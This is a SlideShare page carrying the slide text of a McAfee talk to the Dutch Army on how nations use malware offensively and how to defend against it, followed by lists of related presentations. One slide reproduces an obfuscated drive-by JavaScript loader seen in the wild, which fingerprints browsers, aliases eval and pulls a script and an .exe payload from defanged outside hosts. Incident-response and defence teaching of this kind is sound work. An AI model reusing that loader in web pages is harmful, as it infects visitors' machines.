SlideShare uma empresa Scribd logo

Offensive malware usage and defense

Christiaan Beek
Christiaan Beek

Presentation for the Dutch Army around cyberwarfare and the usage of malware.

Tecnologia
1 de 42
Baixar para ler offline
Malware Offensive usage and how to defend Christiaan Beek McAfee Professional Services
Agenda • $whoami • Examples • Offensive ways of using malware • What goes wrong • Defense recommendations • Final thoughts
> whoami • Christiaan Beek • Practice lead IR & Forensics EMEA • Developer/Instructor MFIRE • Training CERTS
A Little Background Foundstone Services – McAfee Strategic Security
OFFENSE
Offensive usage of malware ENERGY & INFRA Financial MEDICAL MOBILE Defense
Offensive usage of malware Why malware? • low profile during preparation • many options to spread / infect • many ways to hide • self destruct mechanism • many ways to transfer data to
Offensive usage of malware • More and more discovery of malware frameworks • Multiple modules /components • Written by pro’s – sponsored by nations
Offensive - What’s Different? Development Delivery Detection Command & Control Intent • Nation-States • Zero day • Digitally signed • Central • Surveillance propagation with command • Truly compromised • Disrupt / customized • Multi-vectored: certificates • Modular Destroy payloads Blue tooth, payloads USB, network • Outbound ex- filtration masking
Stages of an attack:
Stages of an attack:
Stages of an attack:
Stages of an attack:
Stages of an attack – first script script type="text/javascript" src="swfobject.js"></script> <script src=jpg.js></script> <script type="text/javascript"> if(document.cookie.indexOf("DCHJEik8=")==-1 && hiOC2.indexOf("linux")<=-1 && hiOC2.indexOf("bot")==-1 && hiOC2.indexOf("spider")==-1) var jMJFRp3=deconcept.SWFObjectUtil.getPlayerVersion(); var expires=new Date(); expires.setTime(expires.getTime()+1*60*60*1000); document.cookie="DCHJEik8=Yes;path=/;expires="+expires.toGMTString(); for(WdkimKX2=0,gNRb4=true,sAgnGw8=["msie","firefox","opera"];gNRb4;WdkimKX2++){gNRb4=gNRb4 && (navigator.userAgent.toLowerCase().indexOf(sAgnGw8[WdkimKX2])>-1);if(WdkimKX2==sAgnGw8.length- 1)WdkimKX2=-1;}Hwqq6="0";delete Hwqq6;try{Hwqq6+="0"+"0";}catch(e){yltBe1=unescape;mYSdOxl6 = eval;}CwefLf0=“S1+ADphS1(hmacmx8)))^MqiovxR7);}try{new function(){EmIcO0(EJiD6);}}catch(e){try{new function(){Qkrnq6=parseInt;vKFaTPR4(EJiD6);}}catch(e) } </script> <DIV style="VISIBILITY: hidden; WIDTH: 0px; HEIGHT: 0px"><script language="javascript" src="hxxp://count2.51yes……….. 31931&logo=12" charset="gb2312"></script></DIV>
Final destination?: hxxp://222.7x.xx.xx.xx/x.exe
Inner working?
IIS logs on hacked ‘landing’ server: 9/23/2012 4:06:16 70.49.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:07:46 99.23.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:08:25 93.80.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:14:48 208.91.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:36:05 95.27.x.x W3SVC1 80 GET /pay/x.exe 9/23/2012 5:15:23 208.91.x.x W3SVC1 80 GET /x.exe 9/23/2012 5:29:27 74.125.x.x W3SVC1 80 GET /x.exe Dial 80 Or 443
War story
Future usage of malware
Future scenario’s
Future scenario’s or real...?
Future scenario’s
Future scenario’s
Future scenario’s
Future scenario’s
Future scenario’s
Future scenario’s
What goes wrong regarding Defense? An Intel company
Problem #1 An Intel company Many solutions but how to use them? Forensic Readiness?
Problem #2 An Intel company No visibility on the network No correlation of events
Problem #3 An Intel company Lack of skilled, experienced and dedicated people
Problem #4 An Intel company No Incident Response procedures No Dry-run exercise
Problem #5 An Intel company The attack came from…..
Problem #6 An Intel company Destroying evidence
Problem #7 An Intel company who is the system owner? who will take action? who is allowed to take decisions?
An Intel company Defense Strategies
The Big “Threat” Picture Threats Threats All Threats All Known Core AntiVirus AntiVirus Threats Sees Protects
The “Core” Security Problem • “Unauthorized” Execution End Users = Data – Payload/attachment/link – Network Identity Thieves Spammers – Privilege Bot Herder • “Authorized” Execution – Insiders misuse of privilege Vulnerability Tool Discoverers Developers 100101010010110 Malware Developers
Defense-in-depth
Worthless without:
Final thoughts...... An Intel company - Incidents happen - Is forensic & malware readiness on your agenda? - What needs to be changed in your process? - Is your {army-unit/company/agency/etc} prepared? - Did you separate critical infrastructures? - Can we help you?
Thank you! An Intel company Keep in touch: Email: Christiaan_Beek@McAfee dot com Twitter: @FSEMEA @Foundstone @ChristaanBeek

Recomendados

"Giving the bad guys no sleep"
"Giving the bad guys no sleep""Giving the bad guys no sleep"
"Giving the bad guys no sleep"
Christiaan Beek
 
"There's a pot of Bitcoins behind the ransomware rainbow"
"There's a pot of Bitcoins behind the ransomware rainbow""There's a pot of Bitcoins behind the ransomware rainbow"
"There's a pot of Bitcoins behind the ransomware rainbow"
Christiaan Beek
 
The 4horsemen of ics secapocalypse
The 4horsemen of ics secapocalypseThe 4horsemen of ics secapocalypse
The 4horsemen of ics secapocalypse
Christiaan Beek
 
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
PROIDEA
 
MITRE ATTACKCon Power Hour - December
MITRE ATTACKCon Power Hour - DecemberMITRE ATTACKCon Power Hour - December
MITRE ATTACKCon Power Hour - December
MITRE - ATT&CKcon
 
CSF18 - Incident Response in the Cloud - Yuri Diogenes
CSF18 - Incident Response in the Cloud - Yuri DiogenesCSF18 - Incident Response in the Cloud - Yuri Diogenes
CSF18 - Incident Response in the Cloud - Yuri Diogenes
NCCOMMS
 
MITRE ATT&CKcon 2018: VCAF: Expanding the ATT&CK Framework to cover VERIS Thr...
MITRE ATT&CKcon 2018: VCAF: Expanding the ATT&CK Framework to cover VERIS Thr...MITRE ATT&CKcon 2018: VCAF: Expanding the ATT&CK Framework to cover VERIS Thr...
MITRE ATT&CKcon 2018: VCAF: Expanding the ATT&CK Framework to cover VERIS Thr...
MITRE - ATT&CKcon
 
ANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at ScaleANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at Scale
John Bambenek
 

Recomendados

"Giving the bad guys no sleep"
"Giving the bad guys no sleep""Giving the bad guys no sleep"
"Giving the bad guys no sleep"
Christiaan Beek
 
"There's a pot of Bitcoins behind the ransomware rainbow"
"There's a pot of Bitcoins behind the ransomware rainbow""There's a pot of Bitcoins behind the ransomware rainbow"
"There's a pot of Bitcoins behind the ransomware rainbow"
Christiaan Beek
 
The 4horsemen of ics secapocalypse
The 4horsemen of ics secapocalypseThe 4horsemen of ics secapocalypse
The 4horsemen of ics secapocalypse
Christiaan Beek
 
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
PROIDEA
 
MITRE ATTACKCon Power Hour - December
MITRE ATTACKCon Power Hour - DecemberMITRE ATTACKCon Power Hour - December
MITRE ATTACKCon Power Hour - December
MITRE - ATT&CKcon
 
CSF18 - Incident Response in the Cloud - Yuri Diogenes
CSF18 - Incident Response in the Cloud - Yuri DiogenesCSF18 - Incident Response in the Cloud - Yuri Diogenes
CSF18 - Incident Response in the Cloud - Yuri Diogenes
NCCOMMS
 
MITRE ATT&CKcon 2018: VCAF: Expanding the ATT&CK Framework to cover VERIS Thr...
MITRE ATT&CKcon 2018: VCAF: Expanding the ATT&CK Framework to cover VERIS Thr...MITRE ATT&CKcon 2018: VCAF: Expanding the ATT&CK Framework to cover VERIS Thr...
MITRE ATT&CKcon 2018: VCAF: Expanding the ATT&CK Framework to cover VERIS Thr...
MITRE - ATT&CKcon
 
ANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at ScaleANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at Scale
John Bambenek
 
CSF18 - Guarding Against the Unknown - Rafael Narezzi
CSF18 - Guarding Against the Unknown - Rafael NarezziCSF18 - Guarding Against the Unknown - Rafael Narezzi
CSF18 - Guarding Against the Unknown - Rafael Narezzi
NCCOMMS
 
HITCON 2015 - DGAs, DNS and Threat Intelligence
HITCON 2015 - DGAs, DNS and Threat IntelligenceHITCON 2015 - DGAs, DNS and Threat Intelligence
HITCON 2015 - DGAs, DNS and Threat Intelligence
John Bambenek
 
Defending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael BanksDefending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael Banks
EC-Council
 
Defcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using CryptoDefcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using Crypto
John Bambenek
 
Hunting and Legal Hackback using Cyber Deception
Hunting and Legal Hackback using Cyber DeceptionHunting and Legal Hackback using Cyber Deception
Hunting and Legal Hackback using Cyber Deception
Cymmetria
 
Webinar: Hunting maturity through cyber deception
Webinar: Hunting maturity through cyber deception Webinar: Hunting maturity through cyber deception
Webinar: Hunting maturity through cyber deception
Cymmetria
 
e-Extortion Trends and Defense
e-Extortion Trends and Defensee-Extortion Trends and Defense
e-Extortion Trends and Defense
Erik Iker
 
Breaking the cyber kill chain!
Breaking the cyber kill chain!Breaking the cyber kill chain!
Breaking the cyber kill chain!
Nahidul Kibria
 
CSF18 - The Digital Threat of the Decade (Century) - Sasha Kranjac
CSF18 - The Digital Threat of the Decade (Century) - Sasha KranjacCSF18 - The Digital Threat of the Decade (Century) - Sasha Kranjac
CSF18 - The Digital Threat of the Decade (Century) - Sasha Kranjac
NCCOMMS
 
Corporate Espionage without the Hassle of Committing Felonies
Corporate Espionage without the Hassle of Committing FeloniesCorporate Espionage without the Hassle of Committing Felonies
Corporate Espionage without the Hassle of Committing Felonies
John Bambenek
 
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE - ATT&CKcon
 
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
Chi En (Ashley) Shen
 
Capture the Flag Exercise Using Active Deception Defense
Capture the Flag Exercise Using Active Deception DefenseCapture the Flag Exercise Using Active Deception Defense
Capture the Flag Exercise Using Active Deception Defense
Fidelis Cybersecurity
 
BSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentBSides IR in Heterogeneous Environment
BSides IR in Heterogeneous Environment
Stefano Maccaglia
 
Ransomware
Ransomware Ransomware
Ransomware
Armor
 
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
EC-Council
 
Shamoon
ShamoonShamoon
Shamoon
Shakacon
 
Helping Small Companies Leverage CTI with an Open Source Threat Mapping
Helping Small Companies Leverage CTI with an Open Source Threat MappingHelping Small Companies Leverage CTI with an Open Source Threat Mapping
Helping Small Companies Leverage CTI with an Open Source Threat Mapping
MITRE - ATT&CKcon
 
Cymmetria Webinar: Deception & Responder
Cymmetria Webinar: Deception & ResponderCymmetria Webinar: Deception & Responder
Cymmetria Webinar: Deception & Responder
Cymmetria
 
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015 Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Lastline, Inc.
 
3871778
38717783871778
3871778
Christiaan Beek
 
Taming worms, rats, dragons & more
Taming worms, rats, dragons & moreTaming worms, rats, dragons & more
Taming worms, rats, dragons & more
Christiaan Beek
 

Mais conteúdo relacionado

Mais procurados

Defending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael BanksDefending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael Banks
EC-Council
 
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE - ATT&CKcon
 
Capture the Flag Exercise Using Active Deception Defense
Capture the Flag Exercise Using Active Deception DefenseCapture the Flag Exercise Using Active Deception Defense
Capture the Flag Exercise Using Active Deception Defense
Fidelis Cybersecurity
 
Helping Small Companies Leverage CTI with an Open Source Threat Mapping
Helping Small Companies Leverage CTI with an Open Source Threat MappingHelping Small Companies Leverage CTI with an Open Source Threat Mapping
Helping Small Companies Leverage CTI with an Open Source Threat Mapping
MITRE - ATT&CKcon
 
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015 Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Lastline, Inc.
 

Mais procurados (20)

CSF18 - Guarding Against the Unknown - Rafael Narezzi
CSF18 - Guarding Against the Unknown - Rafael NarezziCSF18 - Guarding Against the Unknown - Rafael Narezzi
CSF18 - Guarding Against the Unknown - Rafael Narezzi
 
HITCON 2015 - DGAs, DNS and Threat Intelligence
HITCON 2015 - DGAs, DNS and Threat IntelligenceHITCON 2015 - DGAs, DNS and Threat Intelligence
HITCON 2015 - DGAs, DNS and Threat Intelligence
 
Defending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael BanksDefending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael Banks
 
Defcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using CryptoDefcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using Crypto
 
Hunting and Legal Hackback using Cyber Deception
Hunting and Legal Hackback using Cyber DeceptionHunting and Legal Hackback using Cyber Deception
Hunting and Legal Hackback using Cyber Deception
 
Webinar: Hunting maturity through cyber deception
Webinar: Hunting maturity through cyber deception Webinar: Hunting maturity through cyber deception
Webinar: Hunting maturity through cyber deception
 
e-Extortion Trends and Defense
e-Extortion Trends and Defensee-Extortion Trends and Defense
e-Extortion Trends and Defense
 
Breaking the cyber kill chain!
Breaking the cyber kill chain!Breaking the cyber kill chain!
Breaking the cyber kill chain!
 
CSF18 - The Digital Threat of the Decade (Century) - Sasha Kranjac
CSF18 - The Digital Threat of the Decade (Century) - Sasha KranjacCSF18 - The Digital Threat of the Decade (Century) - Sasha Kranjac
CSF18 - The Digital Threat of the Decade (Century) - Sasha Kranjac
 
Corporate Espionage without the Hassle of Committing Felonies
Corporate Espionage without the Hassle of Committing FeloniesCorporate Espionage without the Hassle of Committing Felonies
Corporate Espionage without the Hassle of Committing Felonies
 
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
 
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
 
Capture the Flag Exercise Using Active Deception Defense
Capture the Flag Exercise Using Active Deception DefenseCapture the Flag Exercise Using Active Deception Defense
Capture the Flag Exercise Using Active Deception Defense
 
BSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentBSides IR in Heterogeneous Environment
BSides IR in Heterogeneous Environment
 
Ransomware
Ransomware Ransomware
Ransomware
 
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
 
Shamoon
ShamoonShamoon
Shamoon
 
Helping Small Companies Leverage CTI with an Open Source Threat Mapping
Helping Small Companies Leverage CTI with an Open Source Threat MappingHelping Small Companies Leverage CTI with an Open Source Threat Mapping
Helping Small Companies Leverage CTI with an Open Source Threat Mapping
 
Cymmetria Webinar: Deception & Responder
Cymmetria Webinar: Deception & ResponderCymmetria Webinar: Deception & Responder
Cymmetria Webinar: Deception & Responder
 
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015 Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
 

Destaque

EC-Council Hackway Workshop Presentation- Social Media Forensics
EC-Council Hackway Workshop Presentation- Social Media ForensicsEC-Council Hackway Workshop Presentation- Social Media Forensics
EC-Council Hackway Workshop Presentation- Social Media Forensics
Sina Manavi
 

Destaque (14)

3871778
38717783871778
3871778
 
Taming worms, rats, dragons & more
Taming worms, rats, dragons & moreTaming worms, rats, dragons & more
Taming worms, rats, dragons & more
 
[OWASP-TR Mobil Güvenlik Çalıştayı 2015] Yalçın Çakmak - Social Media Apps Fo...
[OWASP-TR Mobil Güvenlik Çalıştayı 2015] Yalçın Çakmak - Social Media Apps Fo...[OWASP-TR Mobil Güvenlik Çalıştayı 2015] Yalçın Çakmak - Social Media Apps Fo...
[OWASP-TR Mobil Güvenlik Çalıştayı 2015] Yalçın Çakmak - Social Media Apps Fo...
 
2011 Social Media Malware Trends
2011 Social Media Malware Trends2011 Social Media Malware Trends
2011 Social Media Malware Trends
 
EC-Council Hackway Workshop Presentation- Social Media Forensics
EC-Council Hackway Workshop Presentation- Social Media ForensicsEC-Council Hackway Workshop Presentation- Social Media Forensics
EC-Council Hackway Workshop Presentation- Social Media Forensics
 
Social Media Forensics for Investigators
Social Media Forensics for InvestigatorsSocial Media Forensics for Investigators
Social Media Forensics for Investigators
 
Lithium Likes to Loves Tour NYC
Lithium Likes to Loves Tour NYCLithium Likes to Loves Tour NYC
Lithium Likes to Loves Tour NYC
 
What Makes Great Infographics
What Makes Great InfographicsWhat Makes Great Infographics
What Makes Great Infographics
 
Masters of SlideShare
Masters of SlideShareMasters of SlideShare
Masters of SlideShare
 
STOP! VIEW THIS! 10-Step Checklist When Uploading to Slideshare
STOP! VIEW THIS! 10-Step Checklist When Uploading to SlideshareSTOP! VIEW THIS! 10-Step Checklist When Uploading to Slideshare
STOP! VIEW THIS! 10-Step Checklist When Uploading to Slideshare
 
You Suck At PowerPoint!
You Suck At PowerPoint!You Suck At PowerPoint!
You Suck At PowerPoint!
 
10 Ways to Win at SlideShare SEO & Presentation Optimization
10 Ways to Win at SlideShare SEO & Presentation Optimization10 Ways to Win at SlideShare SEO & Presentation Optimization
10 Ways to Win at SlideShare SEO & Presentation Optimization
 
How To Get More From SlideShare - Super-Simple Tips For Content Marketing
How To Get More From SlideShare - Super-Simple Tips For Content MarketingHow To Get More From SlideShare - Super-Simple Tips For Content Marketing
How To Get More From SlideShare - Super-Simple Tips For Content Marketing
 
How to Make Awesome SlideShares: Tips & Tricks
How to Make Awesome SlideShares: Tips & TricksHow to Make Awesome SlideShares: Tips & Tricks
How to Make Awesome SlideShares: Tips & Tricks
 

Semelhante a Offensive malware usage and defense

Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin DunnNetworking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
North Texas Chapter of the ISSA
 
How to Detect a Cryptolocker Infection with AlienVault USM
How to Detect a Cryptolocker Infection with AlienVault USMHow to Detect a Cryptolocker Infection with AlienVault USM
How to Detect a Cryptolocker Infection with AlienVault USM
AlienVault
 
How to Detect System Compromise & Data Exfiltration with AlienVault USM
How to Detect System Compromise & Data Exfiltration with AlienVault USMHow to Detect System Compromise & Data Exfiltration with AlienVault USM
How to Detect System Compromise & Data Exfiltration with AlienVault USM
AlienVault
 
Cyber security-briefing-presentation
Cyber security-briefing-presentationCyber security-briefing-presentation
Cyber security-briefing-presentation
sathiyamaha
 
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineReacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Lastline, Inc.
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security
Harish Chaudhary
 
Wfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security InnovationWfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security Innovation
Priyanka Aash
 
Stop Watering Holes, Spear-Phishing and Drive-by Downloads
Stop Watering Holes, Spear-Phishing and Drive-by DownloadsStop Watering Holes, Spear-Phishing and Drive-by Downloads
Stop Watering Holes, Spear-Phishing and Drive-by Downloads
Invincea, Inc.
 

Semelhante a Offensive malware usage and defense (20)

Declaration of malWARe
Declaration of malWAReDeclaration of malWARe
Declaration of malWARe
 
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin DunnNetworking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
Networking 2016-06-14 - The Dirty Secrets of Enterprise Security by Kevin Dunn
 
Defending Enterprise IT - beating assymetricality
Defending Enterprise IT - beating assymetricalityDefending Enterprise IT - beating assymetricality
Defending Enterprise IT - beating assymetricality
 
Keynote at the Cyber Security Summit Prague 2015
Keynote at the Cyber Security Summit Prague 2015Keynote at the Cyber Security Summit Prague 2015
Keynote at the Cyber Security Summit Prague 2015
 
How to Detect a Cryptolocker Infection with AlienVault USM
How to Detect a Cryptolocker Infection with AlienVault USMHow to Detect a Cryptolocker Infection with AlienVault USM
How to Detect a Cryptolocker Infection with AlienVault USM
 
How to Detect System Compromise & Data Exfiltration with AlienVault USM
How to Detect System Compromise & Data Exfiltration with AlienVault USMHow to Detect System Compromise & Data Exfiltration with AlienVault USM
How to Detect System Compromise & Data Exfiltration with AlienVault USM
 
Presentation infra and_datacentrre_dialogue_v2
Presentation infra and_datacentrre_dialogue_v2Presentation infra and_datacentrre_dialogue_v2
Presentation infra and_datacentrre_dialogue_v2
 
Cyber security-briefing-presentation
Cyber security-briefing-presentationCyber security-briefing-presentation
Cyber security-briefing-presentation
 
Prevent Getting Hacked by Using a Network Vulnerability Scanner
Prevent Getting Hacked by Using a Network Vulnerability ScannerPrevent Getting Hacked by Using a Network Vulnerability Scanner
Prevent Getting Hacked by Using a Network Vulnerability Scanner
 
Ten security product categories you've (probably) never heard of
Ten security product categories you've (probably) never heard ofTen security product categories you've (probably) never heard of
Ten security product categories you've (probably) never heard of
 
DSS ITSEC CONFERENCE - Lumension Security - Intelligent application whiteli...
DSS ITSEC CONFERENCE - Lumension Security - Intelligent application whiteli...DSS ITSEC CONFERENCE - Lumension Security - Intelligent application whiteli...
DSS ITSEC CONFERENCE - Lumension Security - Intelligent application whiteli...
 
Operational Security Intelligence
Operational Security IntelligenceOperational Security Intelligence
Operational Security Intelligence
 
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineReacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security
 
NetWitness
NetWitnessNetWitness
NetWitness
 
Wfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security InnovationWfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security Innovation
 
Stop Watering Holes, Spear-Phishing and Drive-by Downloads
Stop Watering Holes, Spear-Phishing and Drive-by DownloadsStop Watering Holes, Spear-Phishing and Drive-by Downloads
Stop Watering Holes, Spear-Phishing and Drive-by Downloads
 
[Bucharest] Catching up with today's malicious actors
[Bucharest] Catching up with today's malicious actors[Bucharest] Catching up with today's malicious actors
[Bucharest] Catching up with today's malicious actors
 
Cybersecurity Concerns You Should be Thinking About
Cybersecurity Concerns You Should be Thinking AboutCybersecurity Concerns You Should be Thinking About
Cybersecurity Concerns You Should be Thinking About
 
Mobile Security
Mobile SecurityMobile Security
Mobile Security
 

Último

Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Roshan Dwivedi
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 

Último (20)

Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
